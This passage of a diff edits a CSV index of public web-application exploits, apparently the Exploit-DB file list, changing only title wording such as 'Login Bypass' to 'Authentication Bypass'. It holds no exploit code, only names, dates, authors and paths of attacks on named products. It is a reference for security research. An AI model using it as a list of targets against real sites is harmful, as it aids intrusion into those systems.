Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 -6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 +6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 @@ -20644,7 +20645,7 @@ id,file,description,date,author,platform,type,port 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - SQL Injection",2008-11-04,G4N0K,php,webapps,0 6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - Authentication Bypass",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 -6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass",2008-11-04,StAkeR,php,webapps,0 +6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Authentication Bypass",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 @@ -20989,7 +20990,7 @@ id,file,description,date,author,platform,type,port 7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Local File Inclusion",2008-12-10,nuclear,php,webapps,0 -7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 +7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Authentication Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 @@ -21069,7 +21070,7 @@ id,file,description,date,author,platform,type,port 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary '.PHP' File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 -7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 +7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Authentication Bypass",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0 @@ -21150,7 +21151,7 @@ id,file,description,date,author,platform,type,port 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 -7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 +7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0 @@ -21385,7 +21386,7 @@ id,file,description,date,author,platform,type,port 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 -7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0 +7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Disclosure",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Arbitrary '.PHP' File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 @@ -21640,7 +21641,7 @@ id,file,description,date,author,platform,type,port 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Authentication Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 -8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 +8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - 'slug' Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 @@ -21768,7 +21769,7 @@ id,file,description,date,author,platform,type,port 8697,platforms/php/webapps/8697.txt,"Joomla! Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0 -8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design -(SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0 +8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0 @@ -22075,7 +22076,7 @@ id,file,description,date,author,platform,type,port 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 @@ -22410,7 +22411,7 @@ id,file,description,date,author,platform,type,port 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0 -9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Path Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 @@ -22425,7 +22426,7 @@ id,file,description,date,author,platform,type,port 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 -9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 +9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 @@ -22858,18 +22859,18 @@ id,file,description,date,author,platform,type,port 10760,platforms/php/webapps/10760.txt,"Joomla! Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,php,webapps,0 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",php,webapps,0 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Arbitrary File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0 -10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Download",2009-12-29,indoushka,asp,webapps,0 -10770,platforms/asp/webapps/10770.txt,"PSnews - Database Download",2009-12-29,indoushka,asp,webapps,0 +10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10770,platforms/asp/webapps/10770.txt,"PSnews - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download",2009-12-29,indoushka,asp,webapps,0 -10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Download",2009-12-29,indoushka,asp,webapps,0 -10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Download",2009-12-29,indoushka,asp,webapps,0 -10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - Database Download",2009-12-29,indoushka,asp,webapps,0 -10775,platforms/asp/webapps/10775.txt,"Uguestbook - Database Download",2009-12-29,indoushka,asp,webapps,0 -10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 - Database Download",2009-12-29,indoushka,asp,webapps,0 -10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Download",2009-12-29,indoushka,asp,webapps,0 -10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Download",2009-12-29,indoushka,asp,webapps,0 +10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10775,platforms/asp/webapps/10775.txt,"Uguestbook - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 +10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - Cross-Site Request Forgery (Add Admin)",2009-12-29,SecurityRules,php,webapps,0 -10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - Database Download",2009-12-29,indoushka,asp,webapps,0 +10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - Database Disclosure",2009-12-29,indoushka,asp,webapps,0 10781,platforms/php/webapps/10781.txt,"ActiveKB - Remote File Inclusion",2009-12-29,indoushka,php,webapps,0 10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection",2009-12-29,R3VAN_BASTARD,php,webapps,0 10788,platforms/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,php,webapps,0 @@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port 10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0 -10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0 +10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Insecure Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0 10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps,0 @@ -22984,14 +22985,14 @@ id,file,description,date,author,platform,type,port 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps,0 11003,platforms/php/webapps/11003.txt,"LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps,0 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 -11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0 +11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Disclosure",2010-01-05,indoushka,asp,webapps,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - 'view_news' SQL Injection",2010-01-06,Err0R,php,webapps,0 11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",php,webapps,0 11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps,0 -11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Download",2010-01-06,indoushka,asp,webapps,0 -11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Download",2010-01-06,indoushka,asp,webapps,0 +11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0 +11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0 11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,php,webapps,0 -11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Download",2010-01-06,indoushka,asp,webapps,0 +11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla! Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 @@ -23041,7 +23042,7 @@ id,file,description,date,author,platform,type,port 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80 -11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Download",2010-01-13,indoushka,asp,webapps,0 +11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Disclosure",2010-01-13,indoushka,asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11136,platforms/php/webapps/11136.txt,"Public Media Manager - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11140,platforms/php/webapps/11140.txt,"Joomla! Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,php,webapps,0 @@ -23050,8 +23051,8 @@ id,file,description,date,author,platform,type,port 11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11155,platforms/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,php,webapps,0 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,php,webapps,0 -11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 -11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 +11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps,0 +11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum - 'layout' Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -23068,7 +23069,7 @@ id,file,description,date,author,platform,type,port 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,php,webapps,0 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass",2010-01-19,cr4wl3r,php,webapps,0 +11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Authentication Bypass",2010-01-19,cr4wl3r,php,webapps,0 11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0 @@ -23306,7 +23307,7 @@ id,file,description,date,author,platform,type,port 11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 -11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0 +11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Disclosure",2010-03-02,indoushka,asp,webapps,0 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0 @@ -23678,9 +23679,9 @@ id,file,description,date,author,platform,type,port 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0 -12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 +12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - Database Disclosure",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - 'Galore' Backup Dump",2010-04-13,indoushka,php,webapps,0 -12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 +12199,platforms/asp/webapps/12199.txt,"My School Script - Database Disclosure",2010-04-13,indoushka,asp,webapps,0 12200,platforms/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,php,webapps,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,php,webapps,0 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 @@ -23994,7 +23995,7 @@ id,file,description,date,author,platform,type,port 12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 -12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 +12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,php,webapps,0 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 @@ -24106,7 +24107,7 @@ id,file,description,date,author,platform,type,port 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,ALTBTA,php,webapps,0 +14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Authentication Bypass",2010-07-06,ALTBTA,php,webapps,0 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - 'skin' Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 @@ -24738,7 +24739,7 @@ id,file,description,date,author,platform,type,port 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0 -15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0 +15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass",2010-09-22,K-159,php,webapps,0 15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 